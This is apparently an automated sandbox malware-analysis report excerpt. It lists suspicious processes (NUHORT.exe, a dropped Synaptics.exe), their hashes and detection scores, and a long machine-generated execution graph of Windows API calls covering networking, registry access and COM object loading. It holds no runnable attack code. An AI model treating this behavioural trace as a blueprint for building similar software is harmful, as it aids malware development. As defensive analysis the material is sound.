                                                                                                                                File size:913'408 bytes
                                                                                                                                MD5 hash:7E05F5F77F8A0F63634CD734AE52CE55
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 50%, ReversingLabs
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:10
                                                                                                                                Start time:12:20:13
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                                                                                                                Imagebase:0x70000
                                                                                                                                File size:913'408 bytes
                                                                                                                                MD5 hash:7E05F5F77F8A0F63634CD734AE52CE55
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:14
                                                                                                                                Start time:12:20:21
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:771'584 bytes
                                                                                                                                MD5 hash:B30E717CDE0FA4A5DE907A7148308430
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:15
                                                                                                                                Start time:12:20:29
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                                                                                                                Imagebase:0x70000
                                                                                                                                File size:913'408 bytes
                                                                                                                                MD5 hash:7E05F5F77F8A0F63634CD734AE52CE55
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:16
                                                                                                                                Start time:12:20:37
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                                                                                                                Imagebase:0x70000
                                                                                                                                File size:913'408 bytes
                                                                                                                                MD5 hash:7E05F5F77F8A0F63634CD734AE52CE55
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:17
                                                                                                                                Start time:12:21:01
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Imagebase:0x70000
                                                                                                                                File size:913'408 bytes
                                                                                                                                MD5 hash:7E05F5F77F8A0F63634CD734AE52CE55
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:21
                                                                                                                                Start time:12:21:52
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 23736
                                                                                                                                Imagebase:0x30000
                                                                                                                                File size:483'680 bytes
                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:22
                                                                                                                                Start time:12:22:00
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Imagebase:0x70000
                                                                                                                                File size:913'408 bytes
                                                                                                                                MD5 hash:7E05F5F77F8A0F63634CD734AE52CE55
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:23
                                                                                                                                Start time:12:22:04
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Windows\splwow64.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\splwow64.exe 12288
                                                                                                                                Imagebase:0x7ff7511c0000
                                                                                                                                File size:163'840 bytes
                                                                                                                                MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                Target ID:26
                                                                                                                                Start time:12:22:24
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 17084
                                                                                                                                Imagebase:0x30000
                                                                                                                                File size:483'680 bytes
                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:27
                                                                                                                                Start time:12:23:00
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Imagebase:0x70000
                                                                                                                                File size:913'408 bytes
                                                                                                                                MD5 hash:7E05F5F77F8A0F63634CD734AE52CE55
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:41
                                                                                                                                Start time:12:23:42
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 14008
                                                                                                                                Imagebase:0x30000
                                                                                                                                File size:483'680 bytes
                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true


                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:4.1%
                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                  Signature Coverage:12%
                                                                                                                                  Total number of Nodes:2000
                                                                                                                                  Total number of Limit Nodes:35
107461->107464 107462 eb2a84 107471 ead380 55 API calls 107462->107471 107466 eb27ef 107464->107466 107480 f1865a 107464->107480 107469 eb2806 107466->107469 107470 f186c9 107466->107470 107468->107461 107468->107462 107491 eb2914 107468->107491 107577 eafa40 107469->107577 107472 f18ac9 107470->107472 107475 eafa40 417 API calls 107470->107475 107474 eb2aab 107471->107474 107695 eed520 86 API calls 4 library calls 107472->107695 107636 ead2d2 107474->107636 107479 f186ee 107475->107479 107483 ead89e 50 API calls 107479->107483 107490 f1870a 107479->107490 107493 eb29ec 107479->107493 107480->107470 107480->107493 107645 eff211 417 API calls 107480->107645 107646 eff4df 417 API calls 107480->107646 107481 f18980 107690 eed520 86 API calls 4 library calls 107481->107690 107482 eb2836 107482->107472 107487 eafa40 417 API calls 107482->107487 107483->107490 107511 eb287c 107487->107511 107488 eac935 48 API calls 107488->107482 107489 eb28cc 107489->107497 107633 eacf97 58 API calls 107489->107633 107496 f1878d 107490->107496 107647 ea346e 48 API calls 107490->107647 107557 eacdb4 107491->107557 107493->107453 107494 eb296e 107494->107493 107501 eb2984 107494->107501 107506 f18a97 107494->107506 107514 f189b4 107494->107514 107495 eb28ac 107495->107489 107688 eacf97 58 API calls 107495->107688 107500 f1882d 107496->107500 107515 f1883f 107496->107515 107664 ee4e71 53 API calls __cinit 107496->107664 107505 eb2900 107497->107505 107689 eacf97 58 API calls 107497->107689 107507 eaca8e 48 API calls 107500->107507 107501->107506 107634 eb41fc 84 API calls 107501->107634 107503 f18888 107508 eb281d 107503->107508 107509 f1888c 107503->107509 107505->107481 107505->107491 107506->107493 107694 ea4b02 50 API calls 107506->107694 107507->107515 107508->107482 107508->107488 107508->107493 107687 eed520 86 API calls 4 library calls 107509->107687 107511->107493 107511->107495 107518 eafa40 417 API calls 107511->107518 107562 efbf80 107514->107562 107686 efc235 417 API calls 
Mailbox 107515->107686 107517 eb29b8 107519 f18a7e 107517->107519 107635 eb41fc 84 API calls 107517->107635 107525 f188ff 107518->107525 107693 ebee93 84 API calls 107519->107693 107520 f18725 107520->107500 107648 eb14a0 107520->107648 107522 f187ca 107523 f18813 107522->107523 107665 ea84a6 107522->107665 107530 ead89e 50 API calls 107523->107530 107525->107493 107531 ead89e 50 API calls 107525->107531 107527 f189f3 107538 f18a01 107527->107538 107539 f18a42 107527->107539 107529 eb29ca 107529->107493 107534 f18a6f 107529->107534 107535 eb29e5 107529->107535 107532 f18821 107530->107532 107531->107495 107536 ead89e 50 API calls 107532->107536 107692 efd1da 50 API calls 107534->107692 107543 ec010a 48 API calls 107535->107543 107536->107500 107537 f1875d 107537->107500 107546 eb14a0 48 API calls 107537->107546 107540 eaca8e 48 API calls 107538->107540 107541 ead89e 50 API calls 107539->107541 107540->107493 107544 f18a4b 107541->107544 107543->107493 107547 ead89e 50 API calls 107544->107547 107545 f187e0 107545->107523 107685 eea76d 49 API calls 107545->107685 107549 f18775 107546->107549 107550 f18a57 107547->107550 107552 ead89e 50 API calls 107549->107552 107691 ea4b02 50 API calls 107550->107691 107551 f18807 107554 ead89e 50 API calls 107551->107554 107555 f18781 107552->107555 107554->107523 107556 ead89e 50 API calls 107555->107556 107556->107496 107558 eacdc5 107557->107558 107559 eacdca 107557->107559 107558->107559 107696 ec2241 48 API calls 107558->107696 107559->107494 107561 eace07 107561->107494 107567 efbfd9 _memset 107562->107567 107564 efc22e 107564->107527 107565 efc14c 107566 efc19f VariantInit VariantClear 107565->107566 107570 efc033 107565->107570 107568 efc1c5 107566->107568 107567->107565 107569 efc097 VariantInit 107567->107569 107567->107570 107568->107570 107571 efc1e6 107568->107571 107574 efc0d6 107569->107574 107699 efc235 417 API calls Mailbox 107570->107699 107698 eea6f6 103 API calls 107571->107698 107573 efc20d VariantClear 
107573->107564 107574->107570 107697 eea6f6 103 API calls 107574->107697 107576->107468 107578 eafa60 107577->107578 107614 eafa8e Mailbox _memmove 107577->107614 107580 ec010a 48 API calls 107578->107580 107579 ec1b2a 52 API calls __cinit 107579->107614 107580->107614 107581 eb105e 107582 eac935 48 API calls 107581->107582 107606 eafbf1 Mailbox 107582->107606 107583 ead3d2 48 API calls 107583->107614 107586 eb0119 108091 eed520 86 API calls 4 library calls 107586->108091 107587 eb1063 108090 eed520 86 API calls 4 library calls 107587->108090 107588 eb0dee 107590 ead89e 50 API calls 107588->107590 107591 eb0dfa 107590->107591 107593 ead89e 50 API calls 107591->107593 107592 f1b772 108092 eed520 86 API calls 4 library calls 107592->108092 107597 eb0e83 107593->107597 107596 eac935 48 API calls 107596->107614 107601 eacaee 48 API calls 107597->107601 107598 eda599 InterlockedDecrement 107598->107614 107600 f1b7d2 107613 eb10f1 Mailbox 107601->107613 107604 eb1230 107604->107606 108089 eed520 86 API calls 4 library calls 107604->108089 107606->107508 107607 ec010a 48 API calls 107607->107614 107608 eafa40 417 API calls 107608->107614 107611 f1b583 108087 eed520 86 API calls 4 library calls 107611->108087 108088 eed520 86 API calls 4 library calls 107613->108088 107614->107579 107614->107581 107614->107583 107614->107586 107614->107587 107614->107588 107614->107591 107614->107592 107614->107596 107614->107597 107614->107598 107614->107604 107614->107606 107614->107607 107614->107608 107614->107611 107614->107613 107700 eaf6d0 107614->107700 107772 ef936f 107614->107772 107800 ebef0d 107614->107800 107843 f0798d 107614->107843 107848 f030ad 107614->107848 107902 f010e5 107614->107902 107908 f0804e 107614->107908 107922 efb74b VariantInit 107614->107922 107963 f01f19 107614->107963 107966 ef92c0 107614->107966 107984 ea50a3 107614->107984 107989 ef8065 GetCursorPos GetForegroundWindow 107614->107989 108003 ebf461 107614->108003 108041 ef9122 107614->108041 108055 f00bfa 
107614->108055 108058 ebdd84 107614->108058 108061 ebf03e 107614->108061 108064 ef013f 107614->108064 108077 f017aa 107614->108077 108082 eb1620 59 API calls Mailbox 107614->108082 108083 efee52 82 API calls 2 library calls 107614->108083 108084 efef9d 90 API calls Mailbox 107614->108084 108085 eeb020 48 API calls 107614->108085 108086 efe713 417 API calls Mailbox 107614->108086 107633->107497 107634->107517 107635->107529 107637 ead30a 107636->107637 107638 ead2df 107636->107638 107637->107491 107641 ead2e6 107638->107641 109494 ead349 53 API calls 107638->109494 107641->107637 109493 ead349 53 API calls 107641->109493 107642->107495 107643->107460 107644->107480 107645->107480 107646->107480 107647->107520 107649 eb1606 107648->107649 107651 eb14b2 107648->107651 107649->107537 107650 eb14be 107656 eb14c9 107650->107656 109496 ea346e 48 API calls 107650->109496 107651->107650 107653 ec010a 48 API calls 107651->107653 107654 f15299 107653->107654 107655 ec010a 48 API calls 107654->107655 107663 f152a4 107655->107663 107657 eb156d 107656->107657 107658 ec010a 48 API calls 107656->107658 107657->107537 107659 eb15af 107658->107659 107660 eb15c2 107659->107660 109495 ebd6b4 48 API calls 107659->109495 107660->107537 107662 ec010a 48 API calls 107662->107663 107663->107650 107663->107662 107664->107522 107666 ea84be 107665->107666 107683 ea84ba 107665->107683 107667 f15592 __i64tow 107666->107667 107668 f15494 107666->107668 107669 ea84d2 107666->107669 107677 ea84ea __itow Mailbox _wcscpy 107666->107677 107670 f1557a 107668->107670 107671 f1549d 107668->107671 109497 ec234b 80 API calls 3 library calls 107669->109497 109498 ec234b 80 API calls 3 library calls 107670->109498 107676 f154bc 107671->107676 107671->107677 107674 ec010a 48 API calls 107675 ea84f4 107674->107675 107679 eacaee 48 API calls 107675->107679 107675->107683 107678 ec010a 48 API calls 107676->107678 107677->107674 107681 f154d9 107678->107681 107679->107683 107680 ec010a 48 API calls 107682 f154ff 
107680->107682 107681->107680 107682->107683 107684 eacaee 48 API calls 107682->107684 107683->107545 107684->107683 107685->107551 107686->107503 107687->107493 107688->107489 107689->107505 107690->107493 107691->107493 107692->107519 107693->107506 107694->107472 107695->107493 107696->107561 107697->107565 107698->107573 107699->107564 107701 eaf77b 107700->107701 107702 eaf708 107700->107702 107707 f1c253 107701->107707 107755 eaf787 107701->107755 107703 f1c4d5 107702->107703 107704 eaf712 107702->107704 107708 f1c4e2 107703->107708 107709 f1c4f4 107703->107709 107705 eaf71c 107704->107705 107710 f1c544 107704->107710 107715 f1c6a4 107705->107715 107716 eaf741 107705->107716 107723 eaf72a 107705->107723 107706 eafa40 417 API calls 107706->107755 108116 eed520 86 API calls 4 library calls 107707->108116 108093 eff34f 107708->108093 108121 efc235 417 API calls Mailbox 107709->108121 107711 f1c585 107710->107711 107734 f1c569 107710->107734 107724 f1c590 107711->107724 107725 f1c5a4 107711->107725 107720 eac935 48 API calls 107715->107720 107717 eaf770 Mailbox 107716->107717 107731 f1c7b5 107716->107731 108223 efee52 82 API calls 2 library calls 107716->108223 107717->107614 107718 f1c264 107718->107614 107719 f1c507 107719->107716 107722 f1c50b 107719->107722 107720->107716 108122 eed520 86 API calls 4 library calls 107722->108122 107723->107716 108222 eda599 InterlockedDecrement 107723->108222 107727 eff34f 417 API calls 107724->107727 108124 efd154 48 API calls 107725->108124 107727->107716 107729 f1c45a 107733 eac935 48 API calls 107729->107733 107738 f1c7eb 107731->107738 108224 efef9d 90 API calls Mailbox 107731->108224 107732 f1c5af 107745 f1c62c 107732->107745 107758 f1c5d1 107732->107758 107733->107716 108123 eed520 86 API calls 4 library calls 107734->108123 107735 eaf84a 107741 f1c32a 107735->107741 107752 eaf854 107735->107752 107739 ead89e 50 API calls 107738->107739 107739->107717 108117 ea342c 48 API calls 107741->108117 107742 f1c793 107744 
ea84a6 81 API calls 107742->107744 107760 f1c79b __NMSG_WRITE 107744->107760 108149 eeafce 48 API calls 107745->108149 107746 f1c7c9 107750 ea84a6 81 API calls 107746->107750 107748 eb14a0 48 API calls 107754 eaf8ab 107748->107754 107749 ec2241 48 API calls 107749->107755 107764 f1c7d1 __NMSG_WRITE 107750->107764 107751 eaf8bb 107751->107716 107751->107718 107751->107729 108118 eda599 InterlockedDecrement 107751->108118 108120 eff4df 417 API calls 107751->108120 107752->107748 107754->107751 107757 eaf9d8 107754->107757 107755->107706 107755->107717 107755->107735 107755->107749 107755->107751 107755->107757 108119 eed520 86 API calls 4 library calls 107757->108119 108125 eea485 48 API calls 107758->108125 107759 f1c63e 108150 ebdf08 48 API calls 107759->108150 107760->107731 107762 ead89e 50 API calls 107760->107762 107762->107731 107764->107738 107765 ead89e 50 API calls 107764->107765 107765->107738 107766 f1c647 Mailbox 108151 eea485 48 API calls 107766->108151 107767 f1c5f6 108126 eb44e0 107767->108126 107770 f1c663 108152 eb3680 107770->108152 107773 eacdb4 48 API calls 107772->107773 107774 ef938a 107773->107774 107775 eacdb4 48 API calls 107774->107775 107776 ef939a 107775->107776 107777 eaca8e 48 API calls 107776->107777 107778 ef93a9 107777->107778 107779 ef93c2 select 107778->107779 107799 ef93ae Mailbox _memmove 107778->107799 107780 ef941f 107779->107780 107781 ef9414 WSAGetLastError 107779->107781 107782 ec010a 48 API calls 107780->107782 107781->107799 107783 ef9428 107782->107783 107784 ea4bce 48 API calls 107783->107784 107785 ef9432 __WSAFDIsSet 107784->107785 107786 ef944a 107785->107786 107785->107799 107787 ef94f5 WSAGetLastError 107786->107787 107788 ef9463 107786->107788 107787->107799 107789 ef947b _strlen 107788->107789 107790 eacdb4 48 API calls 107788->107790 107788->107799 107791 ef94be 107789->107791 107792 ef948e 107789->107792 107790->107789 109049 eead14 48 API calls _memset 107791->109049 109041 ede0f5 48 API calls 2 library calls 
107792->109041 107795 ef9497 109042 efae5a 50 API calls 107795->109042 107797 ef94a3 109043 ea7bef 107797->109043 107799->107614 107801 eaca8e 48 API calls 107800->107801 107802 ebef25 107801->107802 107803 ebeffb 107802->107803 107804 ebef3e 107802->107804 107806 ec010a 48 API calls 107803->107806 109073 ebf0f3 48 API calls 107804->109073 107807 ebf002 107806->107807 107808 ebf00e 107807->107808 109075 ea5080 49 API calls 107807->109075 107810 ea84a6 81 API calls 107808->107810 107815 ebf01c 107810->107815 107811 ebef73 107816 ebf03e 2 API calls 107811->107816 107812 ebef4d 107812->107811 107813 f16942 107812->107813 107814 eacdb4 48 API calls 107812->107814 107813->107614 107817 f16965 107814->107817 107818 ea4bf9 56 API calls 107815->107818 107819 ebef7a 107816->107819 107817->107811 107820 f1696d 107817->107820 107821 ebf02b 107818->107821 107822 f16980 107819->107822 107823 ebef87 107819->107823 107824 eacdb4 48 API calls 107820->107824 107821->107812 107825 f16936 107821->107825 107826 ec010a 48 API calls 107822->107826 107827 ead3d2 48 API calls 107823->107827 107824->107819 107825->107813 109076 ea4592 CloseHandle 107825->109076 107828 f16986 107826->107828 107829 ebef8f 107827->107829 107830 f1699f 107828->107830 109077 ea3d65 ReadFile SetFilePointerEx 107828->109077 109050 ebf04e 107829->109050 107837 f169a3 _memmove 107830->107837 109078 eead14 48 API calls _memset 107830->109078 107835 ebef9e 107836 ea7bef 48 API calls 107835->107836 107835->107837 107838 ebefb2 Mailbox 107836->107838 107839 ebeff2 107838->107839 107840 ea50ec CloseHandle 107838->107840 107839->107614 107841 ebefe4 107840->107841 109074 ea4592 CloseHandle 107841->109074 109121 ea19ee 107843->109121 107847 f079a4 107847->107614 107849 eaca8e 48 API calls 107848->107849 107850 f030ca 107849->107850 107851 ead3d2 48 API calls 107850->107851 107852 f030d3 107851->107852 107853 ead3d2 48 API calls 107852->107853 107854 f030dc 107853->107854 107855 ead3d2 48 API calls 107854->107855 107856 
f030e5 107855->107856 107857 ea84a6 81 API calls 107856->107857 107858 f030f4 107857->107858 107859 f03d7b 48 API calls 107858->107859 107860 f03128 107859->107860 107861 f03af7 49 API calls 107860->107861 107862 f03159 107861->107862 107863 f0319c RegOpenKeyExW 107862->107863 107864 f03172 RegConnectRegistryW 107862->107864 107873 f0315d Mailbox 107862->107873 107866 f031c5 107863->107866 107867 f031f7 107863->107867 107864->107863 107864->107873 107870 f031d9 RegCloseKey 107866->107870 107866->107873 107868 ea84a6 81 API calls 107867->107868 107869 f03207 RegQueryValueExW 107868->107869 107871 f03229 107869->107871 107872 f0323e 107869->107872 107870->107873 107877 f034eb RegCloseKey 107871->107877 107872->107871 107874 f03265 107872->107874 107875 f0344c 107872->107875 107873->107614 107878 f033d9 107874->107878 107879 f0326e 107874->107879 107876 ec010a 48 API calls 107875->107876 107880 f03464 107876->107880 107877->107873 107881 f034fe RegCloseKey 107877->107881 109245 eead14 48 API calls _memset 107878->109245 107883 f03279 107879->107883 107884 f0338d 107879->107884 107885 ea84a6 81 API calls 107880->107885 107881->107873 107887 f032de 107883->107887 107888 f0327e 107883->107888 107889 ea84a6 81 API calls 107884->107889 107892 f03479 RegQueryValueExW 107885->107892 107886 f033e4 107893 ea84a6 81 API calls 107886->107893 107891 ec010a 48 API calls 107887->107891 107888->107871 107896 ea84a6 81 API calls 107888->107896 107890 f033a1 RegQueryValueExW 107889->107890 107890->107871 107894 f032f7 107891->107894 107892->107871 107901 f03331 107892->107901 107895 f033f6 RegQueryValueExW 107893->107895 107897 ea84a6 81 API calls 107894->107897 107895->107871 107895->107877 107898 f0329f RegQueryValueExW 107896->107898 107899 f0330c RegQueryValueExW 107897->107899 107898->107871 107899->107871 107899->107901 107900 eaca8e 48 API calls 107900->107871 107901->107900 107903 ea84a6 81 API calls 107902->107903 107904 f010fb LoadLibraryW 107903->107904 107905 f0111e 
107904->107905 107906 f0110f 107904->107906 107905->107906 109246 f028d9 48 API calls _memmove 107905->109246 107906->107614 107909 ea19ee 83 API calls 107908->107909 107910 f08062 107909->107910 107911 ea1dce 107 API calls 107910->107911 107912 f0806b 107911->107912 107913 f08091 107912->107913 107914 f0806f 107912->107914 107915 ead3d2 48 API calls 107913->107915 107916 eaca8e 48 API calls 107914->107916 107917 f0809a 107915->107917 107921 f0808f Mailbox 107916->107921 109247 ede2e8 107917->109247 107919 f080aa 107920 ea7bef 48 API calls 107919->107920 107920->107921 107921->107614 107923 eaca8e 48 API calls 107922->107923 107924 efb7a3 CoInitialize 107923->107924 107925 efb7ae CoUninitialize 107924->107925 107926 efb7b4 107924->107926 107925->107926 107927 efb7d5 107926->107927 107929 eaca8e 48 API calls 107926->107929 107928 efb81b 107927->107928 107930 ea84a6 81 API calls 107927->107930 107931 ea84a6 81 API calls 107928->107931 107929->107927 107932 efb7ef 107930->107932 107933 efb827 107931->107933 109272 eda857 CLSIDFromProgID ProgIDFromCLSID lstrcmpiW CoTaskMemFree CLSIDFromString 107932->109272 107937 efb9d3 SetErrorMode CoGetInstanceFromFile 107933->107937 107947 efb861 107933->107947 107935 efb802 107935->107928 107936 efb807 107935->107936 109273 efc235 417 API calls Mailbox 107936->109273 107938 efba1f CoGetObject 107937->107938 107939 efba19 SetErrorMode 107937->107939 107938->107939 107943 efbaa8 107938->107943 107960 efb9b1 107939->107960 107941 efb8a8 GetRunningObjectTable 107944 efb8b8 107941->107944 107945 efb8cb 107941->107945 109278 efc235 417 API calls Mailbox 107943->109278 107944->107945 107961 efb8ed 107944->107961 109274 efc235 417 API calls Mailbox 107945->109274 107947->107941 107951 efb89a 107947->107951 107954 eacdb4 48 API calls 107947->107954 107949 efbad0 VariantClear 107949->107614 107950 efb814 Mailbox 107950->107949 107951->107941 107952 efbac2 SetErrorMode 107952->107950 107953 efba53 107955 efba6f 107953->107955 109276 edac4b 
51 API calls Mailbox 107953->109276 107957 efb88a 107954->107957 109277 eea6f6 103 API calls 107955->109277 107957->107951 107959 eacdb4 48 API calls 107957->107959 107959->107951 107960->107943 107960->107953 107961->107960 109275 edac4b 51 API calls Mailbox 107961->109275 109279 f023c5 107963->109279 107967 eaa6d4 48 API calls 107966->107967 107968 ef92d2 107967->107968 107969 ea84a6 81 API calls 107968->107969 107970 ef92e1 107969->107970 107971 ebf26b 50 API calls 107970->107971 107972 ef92ed gethostbyname 107971->107972 107973 ef931d _memmove 107972->107973 107974 ef92fa WSAGetLastError 107972->107974 107976 ef932d inet_ntoa 107973->107976 107975 ef930e 107974->107975 107977 eaca8e 48 API calls 107975->107977 109363 efadca 48 API calls 2 library calls 107976->109363 107983 ef931b Mailbox 107977->107983 107979 ef9342 109364 efae5a 50 API calls 107979->109364 107981 ef934e 107982 ea7bef 48 API calls 107981->107982 107982->107983 107983->107614 107985 ec010a 48 API calls 107984->107985 107986 ea50b3 107985->107986 107987 ea50ec CloseHandle 107986->107987 107988 ea50be 107987->107988 107988->107614 109365 ef6b19 107989->109365 107992 ef80a5 107993 ea3320 48 API calls 107992->107993 107994 ef80b3 107993->107994 109370 eb2320 50 API calls 107994->109370 107995 ef8102 107997 eacdb4 48 API calls 107995->107997 108002 ef80f5 107995->108002 107999 ef812b 107997->107999 107998 ef80cf 109371 eb2320 50 API calls 107998->109371 108001 eacdb4 48 API calls 107999->108001 107999->108002 108001->108002 108002->107614 108004 ebf47f 108003->108004 108005 ebf48a 108003->108005 108006 eacdb4 48 API calls 108004->108006 108007 ebf498 Mailbox 108005->108007 108010 ea84a6 81 API calls 108005->108010 108006->108005 108008 ec010a 48 API calls 108007->108008 108040 ebf50a Mailbox 108007->108040 108009 ebf49f 108008->108009 108011 ebf4af 108009->108011 109372 ea5080 49 API calls 108009->109372 108012 f16841 108010->108012 108015 ea84a6 81 API calls 108011->108015 108014 ec297d 
__wsplitpath 47 API calls 108012->108014 108016 f16859 108014->108016 108017 ebf4bf 108015->108017 108018 eacaee 48 API calls 108016->108018 108019 ea4bf9 56 API calls 108017->108019 108020 f1686a 108018->108020 108021 ebf4ce 108019->108021 109373 ea39e8 48 API calls 2 library calls 108020->109373 108023 f168d4 GetLastError 108021->108023 108026 ebf4d6 108021->108026 108025 f168ed 108023->108025 108024 f16878 108039 f16895 108024->108039 109374 ee6f4b GetFileAttributesW FindFirstFileW FindClose 108024->109374 108025->108026 109375 ea4592 CloseHandle 108025->109375 108029 f16920 108026->108029 108030 ebf4f0 108026->108030 108028 eacdb4 48 API calls 108028->108007 108032 ec010a 48 API calls 108029->108032 108031 ec010a 48 API calls 108030->108031 108036 ebf4f5 108031->108036 108033 f16925 108032->108033 108034 f16888 108037 ee6d6d 52 API calls 108034->108037 108034->108039 108038 ea197e 48 API calls 108036->108038 108037->108039 108038->108040 108039->108028 108040->107614 108042 ea84a6 81 API calls 108041->108042 108043 ef913f 108042->108043 108044 eacdb4 48 API calls 108043->108044 108045 ef9149 108044->108045 109376 efacd3 108045->109376 108047 ef9156 108048 ef915a socket 108047->108048 108053 ef9182 108047->108053 108049 ef916d WSAGetLastError 108048->108049 108050 ef9184 connect 108048->108050 108049->108053 108051 ef91a3 WSAGetLastError 108050->108051 108050->108053 109382 eed7e4 108051->109382 108053->107614 108054 ef91b8 closesocket 108054->108053 109397 eff79f 108055->109397 108057 f00c0a 108057->107614 109472 ebdd92 GetFileAttributesW 108058->109472 108062 ebf0b5 2 API calls 108061->108062 108063 ebf046 108062->108063 108063->107614 108065 ef015e 108064->108065 108066 ef0157 108064->108066 108067 ea84a6 81 API calls 108065->108067 108068 ea84a6 81 API calls 108066->108068 108067->108066 108069 ef017c 108068->108069 109477 ee76db GetFileVersionInfoSizeW 108069->109477 108071 ef018d 108072 ef0192 108071->108072 108074 ef01a3 _wcscmp 108071->108074 108073 
